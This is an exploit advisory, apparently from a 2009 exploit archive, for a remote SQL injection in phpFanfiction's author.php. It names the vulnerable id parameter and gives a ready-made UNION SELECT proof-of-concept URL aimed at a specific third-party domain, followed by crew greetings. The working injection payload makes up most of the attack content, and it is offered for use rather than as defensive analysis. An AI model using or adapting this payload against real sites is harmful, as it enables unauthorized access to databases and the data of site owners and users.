phpFanfiction suffers from a remote SQL injection vulnerability.
91a23a4c71d96df64b707994542dcf5b30055d5e806e837cb166565812f25605
#***************************************************************#
#Title : phpFanfiction [Remote SQL injection]
#***************************************************************#
#Software : phpFanfiction
#Date : 06/27/2009
#Author : S3T4N
#Contact : root[at]sux0r.net
#Blog : http://sux0r.net
#***************************************************************#
#[o]Vulnerable file
#author.php
#***************************************************************#
#[o] Exploit
#http://target/author.php?id=[SQL]
#***************************************************************#
#[o] POC
#http://shitennou.com/author.php?id=-1%20union%20select%201,2,3,4,version(),6,7--
#***************************************************************#
#[o] Greetz
#www.MainHack.com - www.ServerIsDown.org - www.sux0r.net
#VOP Crew [Vaksin13 * OoN_Boy * Paman]
#R3VAN_BASTARD * Kecemplungkalen * eminem *
#zxvf * Pizzyroot * iwannine
#Jupe Crew [makasih buat ngenet gratisnya wkwkwk]
#***************************************************************#